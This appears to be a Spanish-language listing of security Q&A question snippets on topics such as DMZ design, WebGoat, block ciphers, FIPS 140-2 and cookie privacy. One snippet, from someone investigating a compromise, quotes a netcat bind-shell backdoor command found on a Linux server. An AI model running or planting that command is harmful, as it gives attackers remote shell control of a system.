Todas las preguntas

2
respuestas

DMZ para conexiones salientes

Desde una perspectiva de diseño, ¿es una buena idea colocar los servidores que necesitan realizar conexiones salientes a Internet en una DMZ separada? Estos servidores serían servidores como filtros web, servidores WSUS, etc.     
pregunta 28.08.2015 - 02:46
2
respuestas

Dirección IP misteriosa Secuestro

Estoy trabajando en el nuevo sitio web de un cliente. Para poner las cosas en marcha rápidamente, mantenemos su servicio de nombres de dominio y hospedamos el sitio web en otro servidor. El cliente compró el nombre de la URL hace años, nunca lo...
pregunta 01.07.2015 - 23:13
1
respuesta

OWASP WebGoat Advertencia Significado

Estoy empezando con WebGoat. En su página de GitHub [https://github.com/WebGoat/WebGoat] , tienen esta advertencia publicada: WARNING 1: While running this program your machine will be extremely vulnerable to attack. You should to disconnect...
pregunta 16.06.2015 - 03:54
3
respuestas

¿Bloquear la terminología de los sistemas de cifrado?

He estado buscando cifrados de bloque, y encontré esto: ¿Los círculos pequeños con los símbolos más significan XOR? ¿Y cómo se dividen los bloques de texto simple y se combinan los bloques de texto cifrado? Además, ¿cómo puede usted XOR te...
pregunta 01.08.2015 - 05:52
2
respuestas

Requisitos colocados en un usuario de un sistema validado FIPS 140-2

Según los requisitos del cliente, estoy trabajando con un conmutador de red validado por FIPS 140-2 que se ejecuta en modo FIPS. Esto garantiza que cualquier operación criptográfica que realice el dispositivo se realizará con algoritmos aprobado...
pregunta 03.07.2015 - 00:12
2
respuestas

Mi dirección IP cambió repentinamente y luego regresó

A veces miro el historial de inicio de sesión de mi cuenta de blog (un blog de Tumblr) para asegurarme de que nadie más esté ingresando (porque tengo publicaciones privadas que quiero mantener en privado). Aunque hoy accedí a mi blog desde la...
pregunta 28.08.2015 - 22:21
1
respuesta

Almacenamiento de información personal en cookies

Estoy tratando de hacer una integración de pantalla simple entre dos sitios web. Uno en: domain.com y otro en: subdomain.domain.com Todo lo que quiero hacer es mostrar un mensaje "Hola John, Volver al área del cliente" . Estoy b...
pregunta 02.08.2015 - 00:55
1
respuesta

ip xfrm limit en iproute2 para ipsec

Estoy usando los comandos ip xfrm state y ip xfrm policy de la herramienta iproute2 para implementar IPSec. He leído documentación de iproute2 (PDF) y página de manual de ip-xfrm . La página del manual dice:    LIMIT-LIST: = [LIMIT-LIST] l...
pregunta 17.06.2015 - 11:43
1
respuesta

Puerta trasera persistente usando Netcat

He encontrado el siguiente comando varias veces en uno de los servidores de Linux durante una evaluación: nc -l -p 3030 -e /bin/bash Esto permite a un pirata informático obtener control sobre este servidor a través de bash. Al probarlo, me...
pregunta 28.02.2016 - 11:55
2
respuestas

Si el usuario se registra para mi sitio a través de, por ejemplo, Inicio de sesión de Facebook, ¿debería obligar al usuario a crear también una contraseña en mi sitio?

La mayoría de los sitios, cuando se registra a través de, por ejemplo. Facebook, lo redirecciona a una página y luego le solicita que ingrese información adicional que el sitio necesita. Muy a menudo esto incluye establecer una contraseña para e...
pregunta 12.07.2015 - 12:48